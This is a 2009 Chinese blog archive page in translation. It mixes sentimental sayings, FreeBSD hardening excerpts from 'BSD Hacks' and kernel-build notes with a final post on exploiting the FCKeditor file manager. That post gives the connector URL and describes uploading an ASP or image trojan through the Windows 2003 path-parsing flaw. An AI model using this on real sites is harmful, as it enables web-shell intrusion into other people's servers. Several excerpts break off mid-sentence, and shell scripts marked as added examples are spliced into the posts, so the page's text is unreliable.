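Before the Move

Ten Sentences

Posted in Before the Move on April 6th, 2009 by 飘(piao2010)

While tidying up my computer today I happened to come across an article I had saved some time ago, so I am posting it here to pad out the blog with an update.

First sentence
If there are 1000 steps between us
you only need to take the 1st step
and I will walk the other 999 steps toward you

Second sentence
Usually the person willing to stay and argue with you
is the one who truly loves you

Third sentence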

BSD HACKS Excerpts (3)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010)

When Figure 6-1 summarizes the flags, their meanings, and their usual usage. [Hack #58] shows how to create your own file integrity checking program that will alert you if any of your binaries or other important files are changed. An additional layer of protection is to use chflags to prevent those files from being changed in the first place. Usually, the schg

Again, evaluate your particular scenario before implementing this flag. The protection provided by this flag usually far outweighs the inconvenience. The only time the contents of /usr/bin or /usr/sbin should change is when you upgrade the operating system or rebuild your world. Doing that requires a reboot anyway, so dropping to single-user mode to unset schg shouldn’t be a problem.

How often do you change your configuration files in /etc? If you typically configure a system only when it is installed and rarely make changes afterward, protect your configurations with schg. However, keep in mind that a rare configuration change may require you to drop all connections in order to implement it. Also, if you need to add more users to your system, remember to remove that flag from /etc/passwd, /etc/master.passwd, and /etc/group first.

Things are a bit more problematic for a system running installed applications. Most ports install their binaries into /usr/local/bin or /usr/X11R6/bin. If you set the schg flag on those directories, you won’t be able to patch or upgrade those binaries unless you temporarily unset the flag. You’ll have to balance your need to keep your server up and running with the protection you gain from the schg flag and how often you have to patch a particular binary.

6.4.6 Controlling Backups

The last two, arch and nodump, affect backups. The arch flag.

Similarly, when using dump to back up an entire filesystem, the superuser can specify which portions of that filesystem will not be included by setting the nodump flag.

6.4.7 See Also

  • man securelevel

  • man -a chflags (to view all manpages that match chflags, not just the

  • man newsyslog

BSD HACKS Excerpts (2)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010)

ACLs

Edit the superblock with the

# shutdown now
*** FINAL System shutdown message from root@mycompany.com ***
System going down IMMEDIATELY
Dec 11 10:28:07 genisis shutdown: shutdown by root:
System shutdown time has arrived
Writing entropy file:.
Shutting down daemon processes:.
Saving firewall state tables:.
Dec 11 10:28:10 genisis syslogd: exiting on signal 15
Enter full pathname of shell or RETURN for /bin/sh:
#

At the prompt, type:

# /sbin/tunefs -a enable /
# /sbin/tunefs -a enable /usr
# exit

Things [Hack #54] . Don’t reboot yet; you still need to initialize the extended attributes on each file system.

For example, to initialize extended attributes on the /var filesystem, use

# mkdir -p /var/.attribute/system
# cd /var/.attribute/system
# extattrctl initattr -p /var 388 posix1e.acl_access
# extattrctl initattr -p /var 388 posix1e.acl_default

Okay, you’ve successfully enabled ACLs. Now what? Let’s start by viewing ACLs. Looking at ACLs is simple. Files with ACLs will be designated with a + in the long listing provided by ls -l:

% ls -l acl-test
-rw-rw-r--+ 1 rob rob 0 Apr 19 17:27 acl-test

Use the

% getfacl acl-test
#file:acl-test
#owner:1000
#group:1000
user::rw-
user:nobody:rw-
group::r--
group:wheel:rw-
mask::rw-
other::r--

The user::, group::, and other:: fields should all be familiar. They are simply the ACL representations of the standard Unix nobody and wheel lines, however, are new. These specify permissions for specific users and groups (in this case, the nobody user and the wheel group) in addition to the normal set of permissions.

The mask field sets maximum permissions, so an r-- mask (set with m::r) in combination with an rw- permission for a user will give the user only r-- permissions on the file.

 

The chmod, only the file’s owner or the superuser can use this command. You only need to use a few of its options to start manipulating ACLs.

First, a word on syntax. ACLs are specified just as they’re printed by getfacl. Let’s remove and reconstruct the ACL for acl-test:

% setfacl -b acl-test
% setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

The -b option removes all ACLs, except for the standard user, group, and other lines. The -m option modifies the ACL with the specified entry (or comma-separated entries). Entries may also be abbreviated: the code here could have been shortened to u:nobody:rw-,g:wheel:rw-.

You can even use setfacl to modify traditional permissions; setting a user::rw- ACL entry is equivalent to running chmod u=rw on a file.

Removing ACLs is almost identical: setfacl -x u:nobody:rw-,g:wheel:rw- removes that ACL. You can also specify ACLs in files. The -M and -X options perform the functions of their lowercase relatives, but read their entries from a file. Consider the acl-test file again:

% cat test-acl-list
u:nobody:rw-
# this is a comment
g:wheel:rw-
% setfacl -X test-acl-list acl-test
% getfacl acl-test
#file:acl-test
#owner:1000
#group:1000
user::rw-
group::r--
mask::r--
other::r--

BSD HACKS Excerpts (1)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010)

I could not find a Chinese edition to download online, so I can only take notes from the English edition.

 

Let’s start with the copyright information. That’s this part of the default login process:

Copyright (c) 1992-2003 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.

To prevent users from seeing this information, simply:

# touch /etc/COPYRIGHT

Technically, you could add your own information to /etc/COPYRIGHT instead of leaving it as an empty file. However, it is common practice to put your information in /etc/motd instead. The default /etc/motd contains very useful information to the new user, but it does get rather old after a few hundred logins.

You can edit /etc/motd to say whatever suits your purposes—anything from your favorite sci-fi excerpt to all the nasty things that will happen to someone if they continue to try to log into your system. Here’s a very simple example:

# more /etc/motd
*********************************************************
*****            Authorized users only!!            *****
*********************************************************

You’ll note that after you customize your motd, users will still see this text prepended to it:

FreeBSD 5.1-RELEASE (GENERIC) #0: Thu Jun 5 02:55:42 GMT 2003

If you don’t want to advertise your operating system version and kernel information, you’ll need one more hack. Add this line to /etc/rc.conf:

update_motd="NO"

If you’re using FreeBSD 5.x, you no longer have to reboot or go into single-user mode to initialize a change to /etc/rc.conf. Instead, you can use one of the many scripts available in /etc/rc.d. Let’s see if there’s a script that deals with motd:

# ls -F /etc/rc.d | grep motd
motd*

Excellent. Let’s see what syntax that command expects:

# /etc/rc.d/motd
Usage: /etc/rc.d/motd [fast|force](start|stop|restart|rcvar)

Parameters in square brackets are optional, whereas parameters in parentheses are mandatory. Notice each option is separated by the or symbol (|), meaning you just pick one out of the list.

In our case, we want to use the rcvar parameter. This will tell the motd script to reread its setting in /etc/rc.conf:

# /etc/rc.d/motd rcvar
# motd
$update_motd=NO

To use Blowfish, start by opening up /etc/login.conf in your favorite editor. Look for this line:

:passwd_format=md5:\

Carefully edit it so it looks like this:

:passwd_format=blf:\

Check for typos before saving your change.

You may have noticed this comment when you modified /etc/login.conf:

# Remember to rebuild the database after each change to this file:
#
#        cap_mkdb /etc/login.conf
#

Let’s take a closer look at what we’re being asked to do. According to that comment, login.conf is more than a configuration file, it is a database. Not only that, it is a capability database, a database that supports different capabilities. That is the reason behind the weird syntax within login.conf. Whenever you edit a capability database, you have to use the cap_mkdb command to integrate your changes within the database.

So, follow the directions:

# cap_mkdb /etc/login.conf

If you have any existing users, you need to convert their passwords from MD5 to Blowfish. This is why it’s a good idea to make the change before you create your users.

If you’ve already created users, it’s back to the password database to find all of the active accounts. Inactive accounts—accounts that don’t allow logins—have the * character instead of an encrypted password. Since we want to find all of the lines in the password database that do not contain an asterisk, we need an inverted grep:

# grep -v '*' /etc/master.passwd
root:$1$ywXbyPT/$GC8tXN91c.lsKRpLZori61:0:0::0:0:Charlie &:/root:/bin/csh
dru:$1$GFm1nh6I$jh3v4I.QNf450ARgltZU5.:1008:0::0:0:User &:/home/dru:/bin/csh

Well, that worked, but we could make the output look much prettier:

# grep -v '*' /etc/master.passwd | cut -d ':' -f 1
root
dru

Let’s pick apart that command syntax. grep -v creates a reverse filter. In effect, it says, “Show me the lines in /etc/master.passwd that do not contain an *.” Since those lines are long and contain much more than just the username, I piped the output to the cut utility to literally cut out the portions I don’t need to see. Notice that the usernames are the very first thing in each line, and they are always followed by the : field separator. -d tells cut to consider the colon character, not the tab character, as the separator. -f 1 tells cut that I’m interested in the very first field of that line.

It looks like my particular system has two active accounts: root and dru. Notice in the original output the long sequence of characters that starts with $1 and ends with :. No, my users’ passwords aren’t quite that complex. Rather, you’re seeing the password after it’s been encrypted by the MD5 algorithm. That $1 means MD5. It’ll be $2 after we switch to Blowfish encryption. (Be aware that you can’t edit the file directly; the entire password must be changed.)

I’ll now change those two passwords:

# passwd dru
Changing local password for dru
New Password:
Retype New Password:

# passwd
Changing local password for root
New Password:
Retype New Password:

Note that the superuser can change any user’s password by specifying the appropriate username. If you don’t specify a name, you will instead change the root password.

When you’re finished, repeat the original grep -v command and double-check that all of the encrypted passwords now start with $2.
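
An added example, not part of the book excerpt, for that final check: it classifies each active account by the prefix of its password field instead of matching * anywhere on the line, so an account with an asterisk in another field (the constructed ops entry) is not skipped. The sample file, its placeholder hashes and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not from the book): report the hash scheme of every
# account that can log in, testing only the password field.

# Constructed sample in master.passwd layout; hashes are placeholders.
make_sample() {
    cat > "$1" <<'EOF'
root:$2a$04$CONSTRUCTEDsaltCONSTRUCTEDhash:0:0::0:0:Charlie &:/root:/bin/csh
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
dru:$1$CONSTRUCT$CONSTRUCTEDhash00000:1008:0::0:0:User &:/home/dru:/bin/csh
ops:$1$CONSTRUCT$CONSTRUCTEDhash00001:1009:0::0:0:Ops * team:/home/ops:/bin/sh
EOF
}

audit_hashes() {
    awk -F: '
    /^#/ || NF < 2  { next }                     # comments, malformed lines
    $2 ~ /^\*/      { next }                     # * in the hash field: no login
    $2 == ""        { print $1 ": empty";    next }
    $2 ~ /^\$1\$/   { print $1 ": md5";      next }
    $2 ~ /^\$2/     { print $1 ": blowfish"; next }
                    { print $1 ": other" }
    ' "$1"
}

# Accounts that still need a password change to pick up the new format.
pending_rehash() {
    audit_hashes "$1" | awk -F": " '$2 != "blowfish" { print $1 }'
}

tmp=$(mktemp) && make_sample "$tmp" && audit_hashes "$tmp" && rm -f "$tmp"
```

On a real system, run `audit_hashes /etc/master.passwd` as root; an empty result from `pending_rehash` means every active account has been converted.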

Finally, configure the adduser utility to use Blowfish whenever you create a new user by editing /etc/auth.conf. Look for this line:

# crypt_default = md5 des

and carefully change it to:

crypt_default = blf

Once you’ve saved your change, test it by creating a new user. The easiest way to do this is to type adduser and follow the prompts.


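Customizing the FreeBSD Kernel

Posted in FreeBSD, Before the Move on March 14th, 2009 by 飘(piao2010)

References: the FreeBSD Handbook, BSD HACKS

First, change into the directory:

# cd /usr/src/sys/i386/conf

Copy the configuration file and name the copy HACKER-PIAO:

# cp GENERIC HACKER-PIAO

If this directory does not exist, do the following:

# sysinstall

Choose Configure, then Distributions, then src, and select base and sys. If you do not like sysinstall and have an "official" FreeBSD CDROM, you can also install the source code from the command line with the following commands:

# mount /cdrom
# mkdir -p /usr/src/sys
# ln -s /usr/src/sys /sys
# cat /cdrom/src/ssys.[a-d]* | tar -xzvf -
# cat /cdrom/src/sbase.[a-d]* | tar -xzvf -

Next, customize the kernel HACKER-PIAO, mainly by following the Handbook and BSD HACKS. I list a small part of the settings here; for the other settings, see the NOTES file in the current directory.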

makeoptions COPTFLAGS="-O2 -pipe -funroll-loops -ffast-math"
options  DEVICE_POLLING
options  HZ=1000
options  IPFIREWALL
options  DUMMYNET
### When configuring remotely over SSH, use accept
options  IPFIREWALL_DEFAULT_TO_ACCEPT
options  IPDIVERT
options  IPFIREWALL_VERBOSE
options  IPFIREWALL_VERBOSE_LIMIT=100
options  IPSTEALTH
options  ACCEPT_FILTER_DATA
options  ACCEPT_FILTER_HTTP
#options ICMP_BANDLIM      # apparently 7.0 does not support this option
# end of firewall and traffic control settings

I will not list the other settings.

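Change into the /usr/src directory:

# cd /usr/src

Build the kernel:

# make buildkernel KERNCONF=HACKER-PIAO

Wait a long time... If the build fails, adjust the corresponding configuration according to the error messages.

Install the new kernel (this step is fairly quick):

# make installkernel KERNCONF=HACKER-PIAO

Reboot the system:

# shutdown -r now

If no errors appear, it worked. o(∩_∩)o…

Half a day went by just like that, but it was well worth it; I learned a lot.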

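Exploiting the fckeditor vulnerability (only effective against WIN2003)

Posted in Before the Move on March 14th, 2009 by 飘(piao2010)

http://websiteX/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

You can upload an image trojan into a folder with a custom name, exploiting the 2003 path-parsing vulnerability, or upload an ASP trojan directly.

If the site is ASPX, change the /asp/connector.asp suffix to ASPX.

The Type=Image variable is one we define ourselves. For example: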

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
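
From the defender's side, an added example (not from the original post): a shell function that scans W3C-format IIS logs for file-manager requests whose Type value is not one of the stock resource types File, Image, Flash or Media. The log lines are constructed, and the #Fields layout and function names are assumptions.

```shell
#!/bin/sh
# Added example: flag file-manager requests whose Type parameter is not a
# stock resource type. Column positions are read from the #Fields header.

# Constructed sample log (W3C extended format, reduced field set).
sample_iis_log() {
    cat <<'EOF'
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-03-14 10:00:01 GET /fckeditor/editor/filemanager/browser/default/browser.html Type=Image&Connector=connectors/asp/connector.asp 192.0.2.10 200
2009-03-14 10:02:17 GET /fckeditor/editor/filemanager/browser/default/browser.html Type=xiaosei&Connector=connectors/asp/connector.asp 198.51.100.7 200
2009-03-14 10:03:00 GET /index.asp - 192.0.2.10 200
EOF
}

flag_fck_requests() {
    awk '
    /^#Fields:/ {                            # map column names to positions
        for (i = 2; i <= NF; i++) col[$i] = i - 1
        next
    }
    /^#/ || !("cs-uri-stem" in col) { next }
    {
        stem = tolower($(col["cs-uri-stem"]))
        if (index(stem, "/editor/filemanager/") == 0) next
        type = ""
        n = split($(col["cs-uri-query"]), kv, "&")
        for (i = 1; i <= n; i++)
            if (tolower(substr(kv[i], 1, 5)) == "type=") type = substr(kv[i], 6)
        if (type != "" && type !~ /^(File|Image|Flash|Media)$/)
            print $(col["c-ip"]), $(col["cs-uri-stem"]), "Type=" type
    }'
}

sample_iis_log | flag_fck_requests
```

Each output line gives the client address, the requested path and the unexpected Type value, which is a starting point for checking the upload directories for folders of that name.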